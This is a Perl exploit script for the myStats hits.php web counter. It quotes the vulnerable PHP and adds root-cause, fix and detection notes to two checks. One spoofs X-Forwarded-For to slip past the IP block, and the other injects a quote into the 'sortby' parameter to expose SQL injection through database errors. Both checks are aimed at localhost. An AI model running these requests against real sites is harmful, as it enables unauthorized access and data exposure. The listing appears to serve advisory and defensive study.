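# myStats (hits.php) Multiple Remote Vulnerabilities Exploit
# url: http://mywebland.com/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website
#
# Layout of this listing: each section quotes the affected PHP as comments
# (line numbers as given in the advisory), followed by the Perl check that
# demonstrates the issue against a local install. The two checks are
# independent of each other, so each one lives in its own bare block.

use strict;
use warnings;

# ---------------------
# Break System Block IP
# ---------------------
#
# Affected PHP:
#
#    7: if (@getenv("HTTP_X_FORWARDED_FOR")) {
#           $u_ip = @getenv("HTTP_X_FORWARDED_FOR");
#       } else {
#           $u_ip = @getenv("REMOTE_ADDR");
#       }
#       if ($u_ip == BLOCK_IP) {
#           return 1;
#   13:     exit;
#       }
#
#   11: define("BLOCK_IP", "127.0.0.1");
#
# Root cause: X-Forwarded-For is a request header chosen by the client, and
# the code above prefers it over REMOTE_ADDR. The block list is therefore
# compared against a value the requester controls.
#
# Fix: compare BLOCK_IP against REMOTE_ADDR, and honour X-Forwarded-For only
# when REMOTE_ADDR is a reverse proxy the site operates. Logging both values
# makes a mismatch between them visible in the access log.
{
    use HTTP::Request;
    use LWP::UserAgent;

    my $web = "http://localhost/hits.php";
    my $ua  = LWP::UserAgent->new();

    # Any value other than BLOCK_IP makes the comparison at line 7ff fail.
    $ua->default_header('X-Forwarded-For' => "127.1.1.1");

    my $request = HTTP::Request->new(GET => $web);
    $ua->timeout(30);
    my $response  = $ua->request($request);
    my $contenido = $response->content;

    # NOTE(review): is_success only reflects the HTTP status. The blocked
    # path (`return 1`) presumably also answers 2xx, so the saved body in
    # results.txt is what actually shows whether the block applied.
    if ($response->is_success) {
        # Three-argument open with a lexical handle; a failed open or close
        # is reported instead of being followed by a success message.
        open(my $out, '>>', 'results.txt')
            or die "Cannot open results.txt: $!\n";
        print {$out} "$contenido\n";
        close($out)
            or die "Cannot close results.txt: $!\n";
        print "\n[+] Exploit Succesful!\n\n";
    }
    else {
        print "\n[-] Exploit Failed!\n\n";
    }
}

# $ua->default_header('X-Forwarded-For' => "127.1.1.1"); --> BREAK BLOCK_IP

# -------------
# SQL Injection
# -------------
#
# Affected PHP:
#
#   63: if (isset($_GET['sortby'])) {$sortby = $_GET['sortby'];}
#       else { $sortby = 'timestamp' ;}
#       $sql = "SELECT * FROM " . LOG_TBL . " ORDER BY " . $sortby
#            . " DESC LIMIT 0, ". DISPLAY_LOG_NO ;
#   69: $querylog = mysql_query($sql) or die("Line 117 Cannot query the database.
#       " . mysql_error());
#
# Root cause: the `sortby` query parameter is concatenated into the ORDER BY
# clause unchanged. A column name cannot be passed as a bound parameter, so
# the fix is an allowlist: map the request value onto a fixed set of known
# column names and fall back to 'timestamp' for anything else.
#
# Second issue: die() sends mysql_error() to the client, which is exactly
# the text the check below looks for. Log the database error server-side
# and return a generic message. The mysql_* API itself was removed in
# PHP 7; mysqli or PDO are the replacements.
#
# Detection: `sortby` values that are not one of the table's column names
# stand out in the web server's request log.
{
    use HTTP::Request;
    use LWP::UserAgent;

    # A single quote in `sortby` is enough to make the built query invalid.
    my $web = "http://localhost/hits.php?sortby=1'";
    my $ua  = LWP::UserAgent->new();

    my $request = HTTP::Request->new(GET => $web);
    $ua->timeout(30);
    my $response  = $ua->request($request);
    my $contenido = $response->content;

    if ($response->is_success) {
        # The MySQL syntax error echoed by die() is the indicator that the
        # parameter reached the query unescaped.
        if ($contenido =~ /You have an error in your SQL syntax;/) {
            print "\n[+] Exploit Succesful!\n";
            print "\n[+] Content:\n";
            print "$contenido\n\n";
        }
        else {
            # The original printed nothing here, leaving the outcome of a
            # run against a fixed install ambiguous.
            print "\n[-] No SQL error marker in response.\n\n";
        }
    }
    else {
        print "\n[-] Exploit Failed!\n\n";
    }
}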